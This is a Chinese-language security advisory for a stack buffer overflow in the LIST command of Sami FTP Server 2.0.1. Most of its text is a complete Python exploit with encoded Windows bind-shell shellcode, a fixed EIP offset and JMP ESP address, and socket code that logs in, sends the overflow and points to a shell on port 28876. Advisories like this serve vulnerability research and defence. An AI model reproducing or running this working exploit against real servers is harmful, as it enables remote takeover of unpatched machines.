Sami FTP Server 'LIST'命令栈缓冲区溢出漏洞

发布日期：2013-03-01
更新日期：2013-03-05

受影响系统：
KarjaSoft Sami FTP Server 2.0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58247
 
Sami FTP Server 是可在Windows 98/2000/XP/Vista上使用的文件共享FTP服务器。
 
Sami FTP Server 2.0.1在收到较长的LIST命令后会触发缓冲区溢出，用户可查看日志选项卡。
 
<*来源：superkojiman
 
  链接：?utm_source=twitterfeed&utm_medium=twitter
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#!/usr/bin/env python

# Exploit Title: Sami FTP LIST buffer overflow
 # Date: 27 Feb 2013
 # Exploit Author: superkojiman -
 # Vendor Homepage:
 # Version: Sami FTP Server 2.0.1
 # Tested on: Windows XP Pro SP1, English
 #            Windows XP Pro SP2, English
 #
 # Description:
 # A buffer overflow is triggered when a long LIST command is sent to the
 # server and the user views the Log tab.
 #

from socket import *
 import struct, sys

IP = sys.argv[1]

# Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
 # Remove bad chars using msfencode:
 # msfencode -b "\x00\x0a\x0d\x2f" -i w32-bind-ngs-shellcode.bin
 # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
 shellcode = (
 "\xd9\xc7\xbe\x4d\xa5\xde\x30\xd9\x74\x24\xf4\x5f\x2b\xc9" +
 "\xb1\x36\x31\x77\x19\x03\x77\x19\x83\xc7\x04\xaf\x50\xef" +
 "\xf9\x4b\x10\x61\xca\x18\x50\x8e\xa1\x68\x81\x05\xdb\x9c" +
 "\x32\x67\x04\x17\x72\xa0\x0b\x3f\x0e\x23\xc2\x57\xc2\x9c" +
 "\xd6\x95\x4a\x45\x4f\xae\xf9\xe1\xd8\xdf\xf7\x69\xaf\x39" +
 "\xb2\x89\x99\x09\x94\x41\x50\x76\x31\xaa\xc9\x39\xef\x0c" +
 "\x5f\xee\x5e\x0c\xb0\x3c\xc5\x5d\xc4\x61\x39\xe9\x86\x84" +
 "\x39\xec\xdd\x3d\xf2\xce\x20\xa8\x53\x3e\xf1\x68\xd7\x74" +
 "\x64\x6d\x09\xc0\xb0\xc1\xe1\x58\x95\xdd\x36\xea\x90\x2a" +
 "\x7c\x2b\x2e\x3f\xdf\xb8\x9b\x9b\xe1\x57\x14\x54\xf5\xf6" +
 "\xa0\xd1\xea\xf9\x5f\x6c\xfa\xf9\x9b\xff\x50\x7d\x9d\xf6" +
 "\xd3\x76\x6f\x56\x18\xd4\x90\xb6\x77\x4f\xee\x08\x0b\x1a" +
 "\x5e\x2a\x46\x1b\x70\x7f\x67\x34\xe4\xfe\xb7\x4b\xf8\x8f" +
 "\xfb\xd9\x17\xd8\x56\x48\xe7\x36\x2d\xb3\x63\x4e\x1f\xe6" +
 "\xde\xc6\x03\x6b\xbb\x36\x49\x0f\x67\x0e\xfa\x5b\xcc\xa8" +
 "\xbb\x72\x12\x60\xc3\xb9\x31\xdf\x99\x93\x6b\x19\x5a\xfb" +
 "\x84\xf2\x37\x51\xc2\xae\x48\x03\x08\xc5\xf1\x50\x39\x13" +
 "\x02\x57\x45"
 )

# EIP overwritten at offset 218
 # JMP ESP at 10028283 C:\Program Files\PMSystem\Temp\tmp0.dll (Universal)
 buf = "A" * 218 + struct.pack("<I", 0x10028283) + "\x90" * 37 + shellcode

s = socket(AF_INET, SOCK_STREAM)
 s.connect((IP,21))
 print s.recv(1024)

s.send("USER superkojiman\r\n")
 print s.recv(1024)

s.send("PASS letmein\r\n")
 print s.recv(1024)

print "[+] sending payload of size", len(buf)
 s.send("LIST " + buf + "\r\n")
 print s.recv(1024)

s.close()
 print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],)

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
KarjaSoft
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：